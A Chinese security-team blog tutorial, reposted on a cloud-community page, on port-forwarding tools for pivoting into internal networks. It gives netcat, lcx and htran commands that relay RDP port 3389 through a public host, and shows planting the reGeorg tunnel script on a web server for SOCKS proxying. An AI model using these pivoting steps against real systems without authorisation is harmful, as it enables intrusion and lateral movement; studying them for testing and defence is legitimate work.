常见端口转发工具的使用方式

NetCat

NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接。

  • 用途

1: 侦听/传输模式

2:获取banner信息

3:传输文本信息

4:传输文件/目录

5:远程控制/木马

6:加密所有流量

7:流媒体服务器

8:远程克隆硬盘

这里我们主要介绍其端口转发

服务端

cat /tmp/test | nc 127.0.0.1 22 | nc -lp 9000 > /tmp/test

lcx

lcx是一款强大的内网端口转发工具,用于将内网服务器开放的内部端口映射到本地任意端口。

  • 用法
[Usage of Packet Transmit:]

 lcx -<listen|tran|slave> <option> [-log logfile]

[option:]

 -listen <ConnectPort> <TransmitPort>

 -tran   <ConnectPort> <TransmitHost> <TransmitPort>

 -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>

这里我们转发windows3389端口做演示

win2003服务端:

lcx -slave 公网ip port 本地ip 3389

win7客户端:

lcx -listen port port //注意这里的端口为空闲端口

进行连接验证:

连接win7的33389端口进行登陆

reGeorg

reGeorg利用了会话层的socks5协议,效率更高.上传一个代理脚本到服务器端,本地的程序去连接服务器上的脚本,脚本程序做代理转发端口和流量。

服务端:

  • 首先我们可以看到reGeorg中的脚本分别有aspx、jsp、php,适用于各种web server

我们将脚本上传到web目录中脚本正常回显

客户端:

下面我们使用reGeorg进行端口转发

reGeorgSocksProxy.py -p 9999 -u http://192.168.81.128/tunnel.nosocket.php //-p 进行代理的端口 -u 脚本地址

这里我们还需要用到Proxifier

Proxifier

一款功能强大的socks5客户端,可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。

配置如下:

首先我们配置代理

配置规则为默认即可

现在我们找到远程桌面连接右键选择Proxifier选择Proxy SOCKS5 127.0.0.1 然后内网主机ip进行登陆

htran

端口转发工具,这里演示利用一台跳板机去连接另一台机器,高版本的htran还可以进行socks代理。本场景适用于同时在内网的两台机器一台不允许访问公网,这时候我们需要使用跳板进行端口转发进而访问。

目标机器

执行htran -slave 跳板机ip 空闲port 本地ip 3389

跳板机器

执行htran -tran 4444 公网ip 空闲端口

公网机器

执行htran -listen 传来数据的port 转发的port

然后我们可以访问公网机器的转发端口连接目标机器的远程桌面继续进行信息收集利用


原文发布于微信公众号 - ChaMd5安全团队(chamd5sec)

原文发表时间:2017-06-22

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏极客慕白的成长之路

HTTP协议原理及实践

HTTP是在应用层,基于传输层 0x1 低三层 物理层主要作用是定义物理设备如何传输数据 数据链路层在通信的实体间建立数据链路连接 网络层为数据在结...

1273
来自专栏好好学java的技术栈

「文末赠书」http协议简介看这篇就够了

协议,网络协议的简称,网络协议是通信计算机双方必须共同遵从的一组约定。如怎么样建立连接、怎么样互相识别等。只有遵守这个约定,计算机之间才能相互通信交流。它的三要...

933
来自专栏七夜安全博客

PowerProxy原理篇: HTTP代理(1)

1433
来自专栏逸鹏说道

用户不在sudoers 文件中。此事将被报告

跨平台系列汇总:http://www.cnblogs.com/dunitian/p/4822808.html#linux 异常处理汇总-服 务 器 http:/...

3618
来自专栏L宝宝聊IT

ESXI网络及组件的基本概念

2654
来自专栏零基础使用Django2.0.1打造在线教育网站

socket模拟发送http请求

嗨,小伙伴们,好久不见~~~,最近博主在研究socket编程,觉得socket真的好强大。之前一直我们都是在介绍爬虫的requests、urllib等库,我们知...

6842
来自专栏实战docker

Docker下实战zabbix三部曲之三:自定义监控项

通过上一章《Docker下实战zabbix三部曲之二:监控其他机器》的实战,我们了解了对机器的监控是通过在机器上安装zabbix agent来完成的,zabbi...

23810
来自专栏Petrichor的专栏

ping原理 & 测试操作

  ping是一个用来测试网络连接的程序。它使用ICMP协议,请求目的地给予应答,它可以用来测试网络连通性、网络时延等,通常用来作为可用性的检查。它走在网络层,...

3303
来自专栏从零开始学自动化测试

jenkins上新增一个Mac的slave-agent

前言 如果有一台Mac机作为测试机单独跑自动化,那是极好的,并且很稳,本篇讲解如何把Mac机连到jenkins上作为一个节点单独跑自动化用例。 一、新建节点 系...

6196
来自专栏北京马哥教育

linux、mysql、nginx、tomcat 环境下压力测试的主要调试参数

一、linux 系统内核参数 /etc/sysctl.conf文件常用参数 net.core.netdev_max_backlog = 32768 #允许送到队...

3117

扫码关注云+社区

领取腾讯云代金券